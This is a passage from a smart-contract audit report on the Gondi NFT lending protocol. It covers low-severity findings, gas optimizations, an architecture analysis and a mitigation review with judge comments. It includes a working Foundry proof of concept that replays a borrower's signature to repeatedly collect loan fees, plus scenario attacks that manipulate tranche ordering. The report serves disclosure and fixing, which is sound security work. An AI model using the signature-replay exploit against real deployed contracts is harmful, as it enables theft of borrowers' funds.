    emit BaseInterestAllocatorSet(_newBaseInterestAllocator);

As we can see, the check if input _newBaseInterestAllocator matches the pending value is only performed when cachedAllocator != address(0). The same applies to the UPDATE_WAITING_TIME check.

If the contract is deployed without an allocator set up, or whenever the owner sets the allocator address to 0, an attacker could call confirmBaseInterestAllocator() to set it to an arbitrary address.

Consider running all the checks when cachedAllocator == address(0) as well.

Assessed type

Invalid Validation

0xA5DF (judge) commented:

I have some doubts about severity, since this can happen only at the initial stage, and the owner can simply set this to the right address (owner would have to wait some time though). Leaving open for the sponsor to comment.

0xend (Gondi) confirmed and commented:

This is definitely an issue but as pointed out, a low one.

0xA5DF (judge) decreased severity to Low and commented:

Yeah, but when the allocator is changed, the approval is revoked for the old allocator. As this happens only at the initial stage then no funds are expected to be in the pool at this time.

[17] Possible overflow when borrower accepts renegotiation offer in refinanceFull()

Note: At the judge’s request here, this downgraded issue from the same warden has been included in this report for completeness.



In the refinanceFull() function, if the borrower is the caller, it signifies a renegotiation offer. The borrower will clear the accrued interest, permitting them to repay the accrued interest without waiting for the full loan repayment.

} else {
    /// @notice Borrowers clears interest
    _checkSignature(_renegotiationOffer.lender, _renegotiationOffer.hash(), _renegotiationOfferSignature);
    netNewLender -= totalAccruedInterest; // @audit possible overflow when netNewLender < totalAccruedInterest
    totalAccruedInterest = 0;

However, if netNewLender < totalAccruedInterest, there’s a risk of overflow. Consequently, refinanceFull() will revert, preventing the borrower from accepting the renegotiation offer.

Proof of Concept

Consider the following scenario:

  1. Alice (the borrower) takes a 10 ETH loan, and the accrued interest is already 2.1 ETH.
  2. Alice wants to reduce the principal amount and is interested in a renegotiation offer from Bob for a 2 ETH principal amount loan.
  3. When Alice calls refinanceFull() and passes in Bob’s renegotiation offer, it reverts because:
netNewLender = principalAmount - fee = 2 eth (assume fee = 0)
totalAccruedInterest = 2.1 eth
netNewLender -= totalAccruedInterest (revert)

Consider deducting only min(netNewLender, totalAccruedInterest) from netNewLender.

Assessed type


0xend (Gondi) confirmed and commented:

Given the nature of loans, renegotiating a loan to a principal lower than interest accrues seems highly unlikely but would consider this. I think this is a low.

0xA5DF (judge) decreased severity to Low and commented:

@0xend - Marking as low due to this. If the warden can prove that this scenario is at least somewhat likely to happen I’d consider reinstating Medium severity.

[18] Function settleWithBuyout() incorrectly calculate the main lender because single lender can have multiple tranches in a loan

Note: At the judge’s request here, this downgraded issue from the same warden has been included in this report for completeness.



The settleWithBuyout() function is used to settle an auction with a buyout from the main lender. It calculates the main lender by looping through all the tranches and selecting the lender of the largest tranche as the main lender.

uint256 largestTrancheIdx;
uint256 largestPrincipal;
for (uint256 i = 0; i < _loan.tranche.length;) {
    if (_loan.tranche[i].principalAmount > largestPrincipal) {
        largestPrincipal = _loan.tranche[i].principalAmount;
        largestTrancheIdx = i;
    unchecked {

However, this is incorrect as a single lender could have multiple tranches. This could be abused by a borrower to manipulate the selection of the main lender.

Proof of Concept

Consider the following scenario:

  1. Alice (lender) offers to lend 40 eth.
  2. Bob (another lender) offers to lend 20 eth.
  3. Caleb (borrower) wants to allow Bob, not Alice, to buyout his NFT but still wants to borrow all 40 eth from Alice. He can take partial loan from Alice like this:
tranche = [
  0: 20 eth from Bob
  1: 20 eth from Alice
  2: 0.01 eth from Caleb
  3: 20 eth from Alice

As you can see, even though Alice lend 40 eth to Caleb, Bob will be the main lender. And also since the tranche of Alice is not consecutive (Caleb intentionally put 0.01 eth in between), they cannot be merged as well.

To get the correct main lender, sum up the total principal in different tranches from the same lender.

0xend (Gondi) commented:

I think this is highly unlikely given tranches have seniority. Looks like I forgot to check for _getMinTranchePrincipal (will be addressed in the mitigation review) which would also set a cost for caleb.

I’d say this is definitely low risk. Lastly, lender could actually refinance the small tranche from the borrower and merge all tranches.

0xA5DF (judge) decreased severity to Low and commented:

I think that selecting the lender with the biggest tranche rather than the biggest share is a reasonable design considering that finding the lender with the biggest share would be much more complicated and expensive to do on chain. And it isn’t like the lender with the biggest share is losing their debt payment.

Regarding manipulation, as long as it happens at the beginning of the loan, far from the starting time of the auction, I don’t think it’s significant. Marking as Low.

0xA5DF (judge) commented:

Risk Title Verdict
01 No need to approve _aavePool to spend _aToken R
02 Open TODOs R
03 Function burnAndWithdraw() does not withdraw old ERC721s L
04 Function in BytesLib could revert with no error message R
05 setProtocolFee() can be called multiple times to spam event emission R
06 Repayment and liquidation could be blocked if token has a callhook to receiver L
07 Wrong event emission in finalUpdateMultiSourceLoanAddress() L
08 addCallers() does not check _callers.length == pendingCallers.length L
09 Partial refinance offer could be used in refinanceFull() L
10 Owner can set _multiSourceLoan to address(0) directly without updateMultiSourceLoanAddressFirst() L
11 Slippage of stETH swap could make validateOffer() revert L
12 Modifier onlyReadyForWithdrawal is repeatedly execute when users withdraw multiple tokens R
13 Should use defined variable in function _checkValidators() NC
14 Function _checkStrictlyBetter() does not check for ImprovementMinimum L
15 Owner cannot change the allocator address from address(0) L
16 Attacker can set arbitrary allocator in case cachedAllocator == address(0) L
17 Possible overflow when borrower accepts renegotiation offer in refinanceFull() L
18 Function settleWithBuyout() incorrectly calculate the main lender because single lender can have multiple tranches in a loan L

Gas Optimizations

For this audit, 1 report was submitted by wardens detailing gas optimizations. The report highlighted below by erebus received the top score from the judge.

[G-01] Redundant calls to vaultExists modifier with the same _vaultId

There are two identical calls to the same modifier with the same arguments, which is redundant. Remove one of them (see here):

    /// @inheritdoc IUserVault
    /// @dev Read `depositERC721`.                               .---------------------.----------------------------- redundant
    function depositEth(uint256 _vaultId) external payable vaultExists(_vaultId) vaultExists(_vaultId) {
        _vaultERC20s[ETH][_vaultId] += msg.value;

        emit ERC20Deposited(_vaultId, ETH, msg.value);

[G-02] Cached lidoData not used

When reading the aprBps field of the LidoData struct, the fourth line reads from storage instead of the cached one. Consider using lidoData instead of getLidoData, which saves 1 SLOAD (see here).

    /// @inheritdoc IBaseInterestAllocator
    function getBaseApr() external view override returns (uint256) {
        LidoData memory lidoData = getLidoData;
        uint256 aprBps = getLidoData.aprBps;
        if (block.timestamp - lidoData.lastTs > getLidoUpdateTolerance) {
            uint256 shareRate = _currentShareRate();
            aprBps = uint16(
                _BPS * _SECONDS_PER_YEAR * (shareRate - lidoData.shareRate) / lidoData.shareRate
                    / (block.timestamp - lidoData.lastTs) // @audit no me enteroadgahdhjadgadc
        if (aprBps == 0) {
            revert InvalidAprError();
        return aprBps;

[G-03] Optimization when emitting MultiSourceLoanUpdated

As _pendingMultiSourceLoanAddress becomes address(0), then there is no need to do an additional SLOAD in the event emission, just set it to address(0) (see here).

    /// @inheritdoc IPurchaseBundler
    function finalUpdateMultiSourceLoanAddress(address _newAddress) external onlyOwner {
        if (_pendingMultiSourceLoanAddress != _newAddress) {
            revert InvalidAddressUpdateError();

        _multiSourceLoan = MultiSourceLoan(_pendingMultiSourceLoanAddress);
        _pendingMultiSourceLoanAddress = address(0);

        emit MultiSourceLoanUpdated(_pendingMultiSourceLoanAddress);  // should be address(0)

[G-04] Redundant code

In AuctionLoanLiquidator::placeBid, the check for the increment of the highest bid is repeated as it is done already in the _placeBidChecks method. Consider removing the one within the function (here):

    /// @inheritdoc IAuctionLoanLiquidator
    function placeBid(address _nftAddress, uint256 _tokenId, Auction memory _auction, uint256 _bid)
        returns (Auction memory)
        _placeBidChecks(_nftAddress, _tokenId, _auction, _bid);
        // @audit already done in _placeBidChecks
        uint256 currentHighestBid = _auction.highestBid;
        if (_bid == 0 || (currentHighestBid.mulDivDown(_BPS + MIN_INCREMENT_BPS, _BPS) >= _bid)) {
            revert MinBidError(_bid);


    function _placeBidChecks(address _nftAddress, uint256 _tokenId, Auction memory _auction, uint256 _bid)
        _checkAuction(_nftAddress, _tokenId, _auction);
        if (_bid == 0 || (_auction.highestBid.mulDivDown(_BPS + MIN_INCREMENT_BPS, _BPS) >= _bid)) {
            revert MinBidError(_bid);

Audit Analysis

For this audit, 2 analysis reports were submitted by wardens. An analysis report examines the codebase as a whole, providing observations and advice on such topics as architecture, mechanism, or approach. The report highlighted below by minhquanym received the top score from the judge.

The following warden also submitted a report: oakcobalt.

System Overview

What is Gondi

Gondi is a decentralized non-custodial NFT lending protocol that offers the most flexible and capital efficient primitive. Gondi loans allows borrowers to access liquidity and obtain the best marginal rate when available as well as allow lenders to earn yield on their capital with the flexibility of entering and exiting their position any moment without affecting borrowers’ loans.

In new version Gondi V3 loan offers are submitted from both protocol pools as well as peers market participants creating deep liquidity as well as precise risk pricing.


The diagram below presented the interaction of Gondi contracts.

Note: to view the provided image, please see the original submission here.

The Gondi contracts can be divided into three sets:

Loan: This is the core of the Gondi protocol and includes the main logic for the Gondi P2P NFT lending protocol.

  • BaseLoan: Manages basic loan offer and renegotiation offer information. Since the offer is signed off-chain, this contract contains the logic needed to cancel the offer on-chain.
  • PurchaseBundler: Allows users to bundle a purchase and take out a loan in a single transaction. For example, if there’s an NFT for sale at 20e and an outstanding loan offer for 10e, a user only needs 10e to start, instead of needing 20e to buy it first and then take out a loan for 10e.
  • CallbackHandler: Whitelists and checks callback return data. This contract handles calls to PurchaseBundler.
  • LiquidationHandler: Includes the function _liquidateLoan() to handle loan liquidation cases (one lender & multiple lenders).
  • MultiSourceLoan: All the contracts mentioned above are composed into the MultiSourceLoan. This contract, which will be deployed, contains all the logic of these abstract contracts above.

Pool: Gondi Pools are simply ERC4626, allowing lenders to deposit liquidity. This Pool will act as the lender in the main MultiSourceLoan contract.

  • PoolOfferHandler: Whitelists loan terms for different collections, durations, APRs, etc. For any given offer, it checks that the requested principal is below the max allowed, the APR is at least the minimum defined, and the max senior repayment is below the max allowed.
  • WithdrawalQueue: Pools use WithdrawalQueues to manage fund withdrawals. Each withdrawal request is represented by an NFT (which can be traded, borrowed against, etc).
  • FeeManager: A protocol fee contract, contains a function to calculate the fee when a loan is repaid or liquidated.
  • AaveUsdcBaseInterestAllocator: When funds are not deployed to any loan, they could be deposited in third-party protocols to earn base interest. In the case of a USDC pool, it will be deposited in the Aave protocol.
  • LidoEthBaseInterestAllocator: If the asset is WETH, it will be deposited in Lido to earn interest.

Liquidator: Contains the logic to handle liquidation when the borrower cannot meet the repayment deadline.

  • AuctionLoanLiquidator: Implements core functionalities to run an auction for the NFT collateral. It receives an NFT to be auctioned when a loan defaults.
  • AuctionWithBuyoutLoanLiquidator: Extends AuctionLoanLiquidator but adds a feature to allow the main lender to buyout the NFT. The main lender, defined as the lender with the largest tranche in the loan, will need to repay other lenders’ principal plus interest to receive the NFT.
  • LiquidationDistributor: Distributes the received funds after an auction is settled to lenders. Distributions follow a seniority-based waterfall system, covering the principal and accrued interest of the senior tranche before repaying the principal of the next tranche in seniority.

Approach taken in evaluating the codebase

Time spent: 8 days (Full duration of the audit)

Day 1

  • Reading the documentation provided in Gitbook.

Days 2-3

  • Understanding and noting down the logical scope (which contracts will be deployed, which is inherited by other contracts).
  • Review utils contracts, contracts with less logic and will be inherited by other contracts like /utils, AddressManager, InputChecker, Multicall, UserVault, etc.

Days 4-5

  • Review core logic of /loan including BaseLoan, MultiSourceLoan, CallbackHandler and PurchaseBundler.

Days 6-7

  • Review core logic of /pools including Pool, PoolOfferHandler, WithdrawalQueue.
  • Review the interaction of Pool with MultiSourceLoan through LoanManager.

Day 8

  • Writing reports.

Architecture Recommendations

Unique Features

  • Gondi Pool: This feature allows anyone to access yield-bearing assets by simply depositing WETH or USDC into Gondi Pools. The core loan is P2P, so introducing a Pool enables users with less capital and time to participate in the protocol.
  • Multiple Tranches: This feature allows one NFT to draw liquidity from multiple lender offers.

Comparisons with Existing Patterns

  • Gondi is similar to another P2P NFT lending protocol I’ve audited, Particle. Both protocols allow borrowers to take a loan using NFT as collateral and also enable refinancing of existing loans. However, Gondi is more complex, introducing additional features as described above.

Centralization Risks

Involved Actors and Their Roles

  • The primary trust assumption in the contract is the owner role in all contracts. However, core parameters cannot be changed immediately and require the owner’s approval.
  • For all two-step parameter change processes, the contract will always use the input parameters of the caller in the “confirm” step to modify variables. Sometimes, only the owner can call these “confirm” functions, but at other times they are open to everyone. As shown in some H/M reports, there are issues with these functions.

Resources used to gain deeper context on the codebase

  • Official documentation here.
  • Inline comments in codebase.
  • Previous audit reports found here.

Mechanism Review

Permissionless Refinance & Renegotiation

  • In Gondi, lenders can refinance any existing loans in the protocol in a permissionless manner. This means they can refinance any outstanding loan, without the borrower’s action, by reducing the loan’s APR by at least 5%. Refinancing can occur at any time while the loan is outstanding and not locked. However, refinancing is triggered only by the lender and doesn’t require the borrower’s acceptance.
  • The ImprovementMinimum is a useful factor to protect against spamming issues. Without a minimum, attackers could spam refinance loans with only a 1 wei increase in the principal token or increase the loan duration by one second, making it impossible for others to refinance.
  • This mechanism creates a fair and open market for all lenders to offer the best liquidity terms to the borrower. However, it may be challenging for typical users to keep up with and use the protocol. Lenders must monitor their open loans regularly to ensure their loan is still active and their funds are being utilized.

Liquidation Auction

  • Defaulted loans with two or more tranches go through an auction process. The senior tranche lender has priority over more junior tranches. Distributions follow a waterfall from most senior first to most junior last. Distributions first cover the principal and accrued interest of the senior tranche before repaying the principal of the next tranche in seniority.
  • The seniority of a tranche is simply its position in the tranche list in Loan. The protocol allows lenders to specify their preferred position when submitting a loan offer through the maxSeniorRepayment and principalAmount.

Example: [-----amount from offer A--------, --------amount from offer B ---------,]

Looking now at offer B:

  • maxSeniorRepayment Maximum amount of principal+max interest (calculated as the apr at the duration of the loan) from other offers that can be placed ahead of offer B. In other words, A < maxSeniorRepayment.
  • principalAmount Max amount of principal a loan can have up to offer B has been filled. In other words, A+B < principalAmount.

Gondi Pool

  • Gondi Pools are simply a ERC4626, lenders can deposit liquidity to this Pool and this Pool will be the lender in the main MultiSourceLoan contract.
  • Gondi Pools are greatly beneficial for lenders who lack the required knowledge or time to actively manage their open loans.
  • Some NFTs may have high values, so less capital lenders can also participate in the protocol through Gondi Pools.

Systemic Risks/Architecture-Level Weak Spots and Their Mitigation Strategies

  • Missing Input Validation: Some structures serve multiple purposes. For instance, RenegotiationOffer is used in refinanceFull(), refinancePartial(), and addNewTranche(). However, there’s no validation implemented to ensure that the structure only contains the necessary data. Specifically, refinanceFull() doesn’t check if the tranche list is empty. Generally, the protocol lacks sufficient input validation, leading to numerous high-risk issues.
  • Another issue related to shared structures is that borrower/lender signatures for these structures will be identical. This occurs even if they intend to call only one function. Since the structure data is shared, the caller could use the signature to invoke other functions.
  • The two-step process for changing certain parameters is inconsistent. Some functions are only owner-based, while others are permissionless. These functions typically use the input provided in the “confirm” call to update the state variables, but they don’t always verify whether it matches the values in the “pending” call.

Time spent

70 hours

Mitigation Review


Following the C4 audit, 3 wardens (bin2chen, minhquanym and oakcobalt) reviewed the mitigations for all identified issues. Additional details can be found within the C4 Gondi Mitigation Review repository.

Overview of Changes

Summary from the Sponsor:

All invidivual fixes are addressed in a separate PR. The branche feature/developWithOpt contains the merge of all such features + a few that were found by other auditors. Because of contract size issues when adding all fixes, the following has changed:

  • There’s no bonus on Pool reallocation (we expect the dao to run this function and incur the cost).
  • In refinancePartial, we don’t allow extra principal (this is a corner case and can still be done with addNewTranche).
  • Some of the two step variable changes in the Pool (LoanManager) have been moved to a helper contract. Feel free to ignore issues regarding the PoolOfferHandler since we are working on a different one given the limitations of the existing one.
  • Please note the out-of-scope item H-10. While not in scope for awards, general commentary on its design is welcome. The PR for H-12 can give some insight into it.

Mitigation Review Scope

Mitigation of Purpose
H-01 Only tranche lender can call mergeTranches so it assumes the responsibility
H-02 Change order in multiplication/division as suggested
H-03 Added caller check to avoid anyone calling distribute
H-04 Added tokenIdCheck
H-05 Change to safeTransferFrom buyer
H-06 Added loanLiquidation call
H-07 Clear state vars
H-08 Need to break 1 before
H-09 Missing +
H-11 Passing protocol fee
H-12 Added caller check
H-13 Added duration check
H-14 Added nonReentrant
H-15 Strict -> <=
H-16 validateOffer changed to view so validators cannot change state
H-17 Check trancheIndex to differentiate between refiFull/addNewTranche
M-01 Check total tranches + min amount per tranche
M-02 Checking signature from the existing borrower
M-03 addNewTranche uses protocolFee from struct
M-04 changed to reallocate (currentBalance, principalAmount, true) instead of proposed solution (same result) to be compliant with the interface
M-05 Added collectFees method
M-06, M-07 Terms must be passed in the confirm as well
M-08 Only adding a comment here. Borrower should always set block.timestamp + small time delta as expiration to control when the loan can be started
M-09 Missing collected fees in accounting
M-10 Check loanContract
M-11 There’s a min bid now. This + the min improvement invalidates DoS
M-12 Limit auction extensions
M-13 Proactively reallocate (we got rid of the bonus though)
M-14 Corrected calculation of fees as suggested
M-15 Added check (maxDuration cannot be longer)
M-16 Changed to loan end time (instead of current timestamp)
M-17 Added field in hash
M-18 Always call loanManager (even if 0 proceeds)
M-19 Strict to >=
M-20 Set right value for getLidoData timestamp

Out of Scope

H-10 - Refinacing a loan locks the loan. Adding a tranche can only be accepted by the borrower now. External actors can only front-run a limited number of times.

Mitigation Review Summary

The wardens confirmed the mitigations for all in-scope findings except for H-17 and M-12, which were unmitigated. They also surfaced several new issues, including 1 High severity and 4 Medium severity findings. The table below provides details regarding the status of each in-scope vulnerability from the original audit, followed by full details on the new issues and any in-scope vulnerabilities that were unmitigated.

Original Issue Status Full Details
H-01 🟢 Mitigation Confirmed Reports from minhquanym and bin2chen
H-02 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
H-03 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
H-04 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
H-05 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
H-06 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
H-07 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
H-08 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
H-09 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
H-11 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
H-12 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
H-13 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
H-14 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
H-15 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
H-16 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
H-17 🔴 Unmitigated Reports from minhquanym, bin2chen and oakcobalt
M-01 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
M-02 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
M-03 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
M-04 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
M-05 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
M-06 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
M-07 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
M-08 🟢 Mitigation Confirmed Reports from oakcobalt and bin2chen
M-09 🟢 Mitigation Confirmed Reports from oakcobalt and minhquanym
M-10 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
M-11 🟢 Mitigation Confirmed Reports from oakcobalt and minhquanym
M-12 🔴 Unmitigated Report from bin2chen
M-13 🟢 Mitigation Confirmed Reports from oakcobalt and bin2chen
M-14 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
M-15 🟢 Mitigation Confirmed Reports from oakcobalt, bin2chen and minhquanym
M-16 🟢 Mitigation Confirmed Reports from oakcobalt, bin2chen and minhquanym
M-17 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
M-18 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
M-19 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen
M-20 🟢 Mitigation Confirmed Reports from oakcobalt, minhquanym and bin2chen

H-17 Unmitigated

Submitted by minhquanym, also found by bin2chen and oakcobalt



The refinanceFull() and addNewTranche() functions share the same signature. This could lead to an issue where a user signs a signature for a full refinance, but it gets used in addNewTranche(). This could inadvertently increase the principal amount of the loan, which may not be the user’s intention.


The fix did differentiating between the two functions by using the length of trancheIndex and the value of trancheIndex[0].

  • addNewTranche: The length of the trancheIndex must be 1, and its value is _totalTranches. This should result in an out-of-bound error if it’s used in refinance.
  • refinanceFull: The length of trancheIndex must be equal to _totalTranches.

With this check in place, I believe the RenegotiationOffer for a loan with 1 tranche can still be used for both functions. This is because trancheIndex isn’t actually used in refinanceFull, but only in refinancePartial. So the out-of-bound exception will not be raised in refinanceFull.

function _checkAddNewTrancheOffer(RenegotiationOffer calldata _renegotiationOffer, uint256 _totalTranches)
    if (_renegotiationOffer.trancheIndex.length != 1 || _renegotiationOffer.trancheIndex[0] != _totalTranches) {
        revert InvalidRenegotiationOfferError();

function _checkRefinanceFullRenegotiationOffer(
    RenegotiationOffer calldata _renegotiationOffer,
    uint256 _totalTranches
) private pure {
    if (_renegotiationOffer.trancheIndex.length != _totalTranches) {
        revert InvalidRenegotiationOfferError();

0xsomeone (judge) commented:

The Warden describes a case under which exhibit H-17 is not mitigated; specifically, a loan with a single tranche can have a signature generated that will pass both validation functions without raising an error. I believe that the observation is correct as the scenario of a single-tranche loan is valid.

The impact is not the same as the original H-17 exhibit as we are describing a signature intended for creating new tranches being reused for refinancing (instead of the other way around), it still represents a case of H-17 not alleviated.

M-12 Unmitigated

Submitted by bin2chen


Vulnerability details

The PR adds getMaxExtension to address the issue of auction times being indefinitely postponed. The maximum time is: block.timestamp + _liquidationAuctionDuration + getMaxExtension. However, _liquidationAuctionDuration can be modified, with the current constraint being _liquidationAuctionDuration < MAX_AUCTION_DURATION (7 days).

    function updateLiquidationAuctionDuration(uint48 _newDuration) external override onlyOwner {
@>      if (_newDuration < MIN_AUCTION_DURATION || _newDuration > MAX_AUCTION_DURATION) {
            revert InvalidDurationError();
        _liquidationAuctionDuration = _newDuration;

        emit LiquidationAuctionDurationUpdated(_newDuration);

Therefore, it’s still possible that: block.timestamp + _liquidationAuctionDuration + getMaxExtension could exceed 7 Days.

It is recommended to restrict _liquidationAuctionDuration + ILoanLiquidator(liquidator).getMaxExtension < MAX_AUCTION_DURATION.

    function updateLiquidationAuctionDuration(uint48 _newDuration) external override onlyOwner {
-       if (_newDuration < MIN_AUCTION_DURATION || _newDuration > MAX_AUCTION_DURATION) {
+       if (_newDuration < MIN_AUCTION_DURATION || _newDuration + ILoanLiquidator(liquidator).getMaxExtension  > MAX_AUCTION_DURATION) {    
            revert InvalidDurationError();
        _liquidationAuctionDuration = _newDuration;

        emit LiquidationAuctionDurationUpdated(_newDuration);

Assessed type


0xsomeone (judge) commented:

The Warden specifies that M-12 has not been sufficiently mitigated as the vulnerability can still resurface after a reconfiguration of the contract due to inadequate limitations in the LiquidationHandler::updateLiquidationAuctionDuration function. I consider the rationale sufficiently elaborated and confirm that M-12 remains unmitigated as it can resurface via future reconfigurations of the system that should be prohibited by the code itself.

refinanceFromLoanExecutionData() Reusing borrower’s signature to steal funds

Submitted by bin2chen

Severity: High


Vulnerability details

In refinanceFromLoanExecutionData(), the LoanExecutionData signature of borrower is reusable (since there are no nonces, as long as it doesn’t expire).

Suppose loanOffer.fee =100. Then, each time refinanceFromLoanExecutionData() is executed the funds flow as follows:

  1. Lender pay = loanOffer.principalAmount - loanOffer.fee
  2. Borrower repay = loanOffer.principalAmount

So for each execution, lender receives a loanOffer.fee difference (loanOffer.principalAmount - (loanOffer.principalAmount - loanOffer.fee)).

This way a malicious lender can monitor emitLoan() to reuse the signature of the borrower to steal funds. Example below:

  1. Bob signs a borrower’s LoanExecutionData and executes emitLoan(). loan: {fee = 1% , lender = Alice}.
  2. Malicious user Alice executes refinanceFromLoanExecutionData(loan) after Bob’s transaction, using the signature that Bob just signed.
  3. Every time refinanceFromLoanExecutionData(loan) is executed, Alice gets an extra fee = 1%.


The following code demonstrates the reuse of the emitLoan() signature to steal funds.

Add to MultiSourceLoan.t.sol:

    function testReuseBorrowSign() public {
        uint256 privateKey = 100;
        address otherBorrower = vm.addr(privateKey);
        uint256 otherToken = collateralTokenId + 1;

        IMultiSourceLoan.LoanOffer memory loanOffer =
            _getSampleOffer(address(collateralCollection), otherToken, _INITIAL_PRINCIPAL);
        //@info capacity can't 0
        loanOffer.capacity = 1000000e18;
        //@info need fees 1 %
        loanOffer.fee = _INITIAL_PRINCIPAL / 100;         
        testToken.mint(loanOffer.lender, _INITIAL_PRINCIPAL * 10000);
        testToken.mint(otherBorrower, _INITIAL_PRINCIPAL * 10000);
        testToken.approve(address(_msLoan), type(uint256).max);

        collateralCollection.mint(otherBorrower, otherToken);
        collateralCollection.approve(address(_msLoan), otherToken);
        loanOffer.nftCollateralTokenId = otherToken;

        loanOffer.duration = 30 days;
        IMultiSourceLoan.LoanExecutionData memory lde = _sampleLoanExecutionData(loanOffer);
        lde.executionData.tokenId = otherToken;
        lde.borrower = otherBorrower;
        bytes32 executionDataHash = _msLoan.DOMAIN_SEPARATOR().toTypedDataHash(lde.executionData.hash());
        (uint8 vOffer, bytes32 rOffer, bytes32 sOffer) = vm.sign(privateKey, executionDataHash);
        lde.borrowerOfferSignature = abi.encodePacked(rOffer, sOffer, vOffer);
        //@info first loan
        (uint256 loanId, IMultiSourceLoan.Loan memory loan) = _msLoan.emitLoan(lde);

        //@info ********* reuse sign *********
        uint256 initBalance = testToken.balanceOf(loanOffer.lender);
        for(uint i = 0; i < 10; i++) {
            (loanId, loan) =
                _msLoan.refinanceFromLoanExecutionData(loanId, loan, lde);  
            console.log("lender balance increased:", testToken.balanceOf(loanOffer.lender) - initBalance);
        //@info ********* reuse sign end *********
$ forge test -vvv --match-test testReuseBorrowSign

[PASS] testReuseBorrowSign() (gas: 952628)
  lender balance increased: 1000000
  lender balance increased: 2000000
  lender balance increased: 3000000
  lender balance increased: 4000000
  lender balance increased: 5000000
  lender balance increased: 6000000
  lender balance increased: 7000000
  lender balance increased: 8000000
  lender balance increased: 9000000
  lender balance increased: 10000000


Reusing LoanExecutionData signature to steal funds.

Recommend that all signatures in the protocol require nonces (requires major changes); or, refinanceFromLoanExecutionData() can only be executed by borrower itself.

Assessed type


0xend (Gondi) confirmed

0xsomeone (judge) commented:

The Warden demonstrates a significant signature re-use vulnerability that will permit a fee to be consecutively re-executed to increase the fee a lender acquires from their borrower. A high risk rating is appropriate for this vulnerability given that funds are directly affected.

getLoanManager.updateOfferHandler() should be executed inside confirmOfferHandler()

Submitted by bin2chen, also found by minhquanym

Severity: Medium


Vulnerability details

The PR adds that the new __offerHandler.getMaxDuration can’t be larger than the old one, and already avoids the problem of getMinTimeBetweenWithdrawalQueues being too large. Also added using LoanManagerParameterSetter.sol to set offerHandler.

In two steps:

  1. setOfferHandler() => set ProposedOfferHandler = new offerHandler.
  2. After the UPDATE_WAITING_TIME time expires, execute confirmOfferHandler() to make the ProposedOfferHandler effective.

But currently it works immediately, not after UPDATE_WAITING_TIME.

    function setOfferHandler(address __offerHandler) external onlyOwner {

        if (IPoolOfferHandler(__offerHandler).getMaxDuration() > IPoolOfferHandler(getOfferHandler).getMaxDuration()) {
            revert InvalidInputError();

        getProposedOfferHandler = __offerHandler;
        getProposedOfferHandlerSetTime = block.timestamp;
@>      ILoanManager(getLoanManager).updateOfferHandler(__offerHandler); //@audit call in  confirmOfferHandler()

        emit ProposedOfferHandlerSet(__offerHandler);

    /// @notice Confirm the OfferHandler contract.
    /// @param __offerHandler The new OfferHandler address.
    function confirmOfferHandler(address __offerHandler) external onlyOwner {
        if (getProposedOfferHandlerSetTime + UPDATE_WAITING_TIME > block.timestamp) {
            revert TooSoonError();
        if (getProposedOfferHandler != __offerHandler) {
            revert InvalidInputError();

        getOfferHandler = __offerHandler;
        getProposedOfferHandler = address(0);
        getProposedOfferHandlerSetTime = type(uint256).max;

        emit OfferHandlerSet(__offerHandler);
    function setOfferHandler(address __offerHandler) external onlyOwner {

        if (IPoolOfferHandler(__offerHandler).getMaxDuration() > IPoolOfferHandler(getOfferHandler).getMaxDuration()) {
            revert InvalidInputError();

        getProposedOfferHandler = __offerHandler;
        getProposedOfferHandlerSetTime = block.timestamp;
-       ILoanManager(getLoanManager).updateOfferHandler(__offerHandler);

        emit ProposedOfferHandlerSet(__offerHandler);

    /// @notice Confirm the OfferHandler contract.
    /// @param __offerHandler The new OfferHandler address.
    function confirmOfferHandler(address __offerHandler) external onlyOwner {
        if (getProposedOfferHandlerSetTime + UPDATE_WAITING_TIME > block.timestamp) {
            revert TooSoonError();
        if (getProposedOfferHandler != __offerHandler) {
            revert InvalidInputError();
        getOfferHandler = __offerHandler;
        getProposedOfferHandler = address(0);
        getProposedOfferHandlerSetTime = type(uint256).max;
+       ILoanManager(getLoanManager).updateOfferHandler(__offerHandler);

        emit OfferHandlerSet(__offerHandler);

Assessed type


0xend (Gondi) confirmed via duplicate Issue #86

0xsomeone (judge) commented:

The Warden highlights how the revised offer handler update mechanism will fail to enforce the two-step process properly, and will immediately update the offer handler. I consider a medium risk rating to be appropriate for this submission, but it does not relate to the M-15 mitigation as that was carried out properly and its atomic change does not introduce this issue.

AuctionWithBuyoutLoanLiquidator lender get less interest

Submitted by bin2chen

Severity: Medium



Vulnerability details

The PR changed to loan end time instead of current timestamp. In order to resolve the issue of liquidation,LiquidationDistributor.distribute() may break maxSeniorRepayment’s expectations.

There are two issues:

First Issue: The PR Also modified another contract AuctionWithBuyoutLoanLiquidator.sol:

contract AuctionWithBuyoutLoanLiquidator is AuctionLoanLiquidator {

+       uint256 loanEndTime = _loan.startTime + _loan.duration;
        uint256 totalOwed;
        for (uint256 i; i < _loan.tranche.length;) {
